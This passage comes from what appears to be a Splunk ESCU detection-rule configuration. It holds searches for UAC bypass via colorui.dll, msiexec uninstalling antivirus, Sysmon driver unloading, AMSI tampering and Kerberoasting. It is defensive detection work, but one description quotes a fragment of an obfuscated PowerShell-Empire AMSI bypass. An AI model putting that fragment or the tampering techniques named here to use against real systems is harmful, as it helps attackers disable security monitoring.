-70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - UAC Bypass With Colorui COM Object - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. action.notable.param.rule_title = UAC Bypass With Colorui COM Object action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded="*\\colorui.dll" process_name != "colorcpl.exe" NOT(Image IN("*\\windows\\*", "*\\program files*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest user_id EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter` [ESCU - Uninstall App Using MsiExec - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious un-installation of application using msiexec. This technique was seen in conti leak tool and script where it tries to uninstall AV product using this commandline. This commandline to uninstall product is not a common practice in enterprise network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.007", "T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious un-installation of application using msiexec. This technique was seen in conti leak tool and script where it tries to uninstall AV product using this commandline. This commandline to uninstall product is not a common practice in enterprise network. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown. action.escu.creation_date = 2021-08-09 action.escu.modification_date = 2021-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Uninstall App Using MsiExec - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = process $process_name$ with a cmdline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Uninstall App Using MsiExec - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.007", "T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious un-installation of application using msiexec. This technique was seen in conti leak tool and script where it tries to uninstall AV product using this commandline. This commandline to uninstall product is not a common practice in enterprise network. action.notable.param.rule_title = Uninstall App Using MsiExec action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msiexec.exe Processes.process= "* /qn *" Processes.process= "*/X*" Processes.process= "*REBOOT=*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uninstall_app_using_msiexec_filter` [ESCU - Unknown Process Using The Kerberos Protocol - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process performing an outbound connection on port 88 used by default by the network authentication protocol Kerberos. Typically, on a regular Windows endpoint, only the lsass.exe process is the one tasked with connecting to the Kerberos Distribution Center to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies a process performing an outbound connection on port 88 used by default by the network authentication protocol Kerberos. Typically, on a regular Windows endpoint, only the lsass.exe process is the one tasked with connecting to the Kerberos Distribution Center to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Custom applications may leverage the Kerberos protocol. Filter as needed. action.escu.creation_date = 2024-01-23 action.escu.modification_date = 2024-01-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Unknown Process Using The Kerberos Protocol - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Unknown process $process_name$ using the kerberos protocol detected on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unknown Process Using The Kerberos Protocol - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process performing an outbound connection on port 88 used by default by the network authentication protocol Kerberos. Typically, on a regular Windows endpoint, only the lsass.exe process is the one tasked with connecting to the Kerberos Distribution Center to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. action.notable.param.rule_title = Unknown Process Using The Kerberos Protocol action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name!=lsass.exe by _time Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id dest [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port = 88 by All_Traffic.src All_Traffic.process_id All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename src as dest ] | table _time dest parent_process_name process_name process_path process process_id dest_port | `unknown_process_using_the_kerberos_protocol_filter` [ESCU - Unload Sysmon Filter Driver - Rule] action.escu = 0 action.escu.enabled = 1 description = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown at the moment action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Unload Sysmon Filter Driver - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["CISA AA23-347A", "Disabling Security Tools"] action.risk = 1 action.risk.param._risk_message = Possible Sysmon filter driver unloading on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unload Sysmon Filter Driver - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.notable.param.rule_title = Unload Sysmon Filter Driver action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fltMC.exe AND Processes.process=*unload* AND Processes.process=*SysmonDrv* by Processes.process_name Processes.process_id Processes.parent_process_name Processes.process Processes.dest Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` |`unload_sysmon_filter_driver_filter`| table firstTime lastTime dest user count process_name process_id parent_process_name process [ESCU - Unloading AMSI via Reflection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562", "T1059.001", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Potential for some third party applications to disable AMSI upon invocation. Filter as needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Unloading AMSI via Reflection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Possible AMSI Unloading via Reflection using PowerShell on $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unloading AMSI via Reflection - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562", "T1059.001", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Unloading AMSI via Reflection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = *system.management.automation.amsi* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `unloading_amsi_via_reflection_filter` [ESCU - Unusual Number of Computer Service Tickets Requested - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4769, `A Kerberos service ticket was requested`, to identify an unusual number of computer service ticket requests from one source. When a domain joined endpoint connects to a remote endpoint, it first will request a Kerberos Ticket with the computer name as the Service Name. An endpoint requesting a large number of computer service tickets for different endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service requests. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 4769, `A Kerberos service ticket was requested`, to identify an unusual number of computer service ticket requests from one source. When a domain joined endpoint connects to a remote endpoint, it first will request a Kerberos Ticket with the computer name as the Service Name. An endpoint requesting a large number of computer service tickets for different endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service requests. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = An single endpoint requesting a large number of computer service tickets is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systeams and missconfigured systems. action.escu.creation_date = 2021-12-01 action.escu.modification_date = 2021-12-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Computer Service Tickets Requested - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusual Number of Computer Service Tickets Requested - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 Service_Name="*$" Account_Name!="*$*" | bucket span=2m _time | stats dc(Service_Name) AS unique_targets values(Service_Name) as host_targets by _time, Client_Address, Account_Name | eventstats avg(unique_targets) as comp_avg , stdev(unique_targets) as comp_std by Client_Address, Account_Name | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_targets >10 and unique_targets >= upperBound, 1, 0) | `unusual_number_of_computer_service_tickets_requested_filter` [ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline allowing them to obtain privileged access to the domain.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number service ticket requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline allowing them to obtain privileged access to the domain.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number service ticket requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = An single endpoint requesting a large number of kerberos service tickets is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systems and missconfigured systems. action.escu.creation_date = 2022-02-08 action.escu.modification_date = 2022-02-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 Service_Name!="*$" Ticket_Encryption_Type=0x17 | bucket span=2m _time | stats dc(Service_Name) AS unique_services values(Service_Name) as requested_services by _time, Client_Address | eventstats avg(unique_services) as comp_avg , stdev(unique_services) as comp_std by Client_Address | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_services > 2 and unique_services >= upperBound, 1, 0) | search isOutlier=1 | `unusual_number_of_kerberos_service_tickets_requested_filter` [ESCU - Unusual Number of Remote Endpoint Authentication Events - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4624, `An account was successfully logged on`, to identify an unusual number of remote authentication attempts coming from one source. An endpoint authenticating to a large number of remote endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual high number of authentication events.To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation.This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 4624, `An account was successfully logged on`, to identify an unusual number of remote authentication attempts coming from one source. An endpoint authenticating to a large number of remote endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual high number of authentication events.To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation.This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Event Logs from domain controllers as well as member servers and workstations. The Advanced Security Audit policy setting `Audit Logon` within `Logon/Logoff` needs to be enabled. action.escu.known_false_positives = An single endpoint authenticating to a large number of hosts is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, jump servers and missconfigured systems. action.escu.creation_date = 2021-12-01 action.escu.modification_date = 2021-12-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Remote Endpoint Authentication Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusual Number of Remote Endpoint Authentication Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4624 Logon_Type=3 Account_Name!="*$" | eval Source_Account = mvindex(Account_Name, 1) | bucket span=2m _time | stats dc(ComputerName) AS unique_targets values(ComputerName) as target_hosts by _time, Source_Network_Address, Source_Account | eventstats avg(unique_targets) as comp_avg , stdev(unique_targets) as comp_std by Source_Network_Address, Source_Account | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_targets >10 and unique_targets >= upperBound, 1, 0) | `unusual_number_of_remote_endpoint_authentication_events_filter` [ESCU - Unusually Long Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects command lines that are extremely long, which might be indicative of malicious activity on your hosts because attackers often use obfuscated or complex command lines to hide their actions and evade detection. This helps to mitigate the risks associated with long command lines to enhance your overall security posture and reduce the impact of attacks. This detection is important because it suggests that an attacker might be attempting to execute a malicious command or payload on the host, which can lead to various damaging outcomes such as data theft, ransomware, or further compromise of the system. False positives might occur since legitimate processes or commands can sometimes result in long command lines. Next steps include conducting extensive triage and investigation to differentiate between legitimate and malicious activities. Review the source of the command line and the command itself during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects command lines that are extremely long, which might be indicative of malicious activity on your hosts because attackers often use obfuscated or complex command lines to hide their actions and evade detection. This helps to mitigate the risks associated with long command lines to enhance your overall security posture and reduce the impact of attacks. This detection is important because it suggests that an attacker might be attempting to execute a malicious command or payload on the host, which can lead to various damaging outcomes such as data theft, ransomware, or further compromise of the system. False positives might occur since legitimate processes or commands can sometimes result in long command lines. Next steps include conducting extensive triage and investigation to differentiate between legitimate and malicious activities. Review the source of the command line and the command itself during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate applications start with long command lines. action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusually Long Command Line - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Unusually long command line $process_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusually Long Command Line - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| eval processlen=len(process) | eventstats stdev(processlen) as stdev, avg(processlen) as avg by dest | stats max(processlen) as maxlen, values(stdev) as stdevperhost, values(avg) as avgperhost by dest, user, process_name, process | `unusually_long_command_line_filter` |eval threshold = 3 | where maxlen > ((threshold*stdevperhost) + avgperhost) [ESCU - Unusually Long Command Line - MLTK - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk 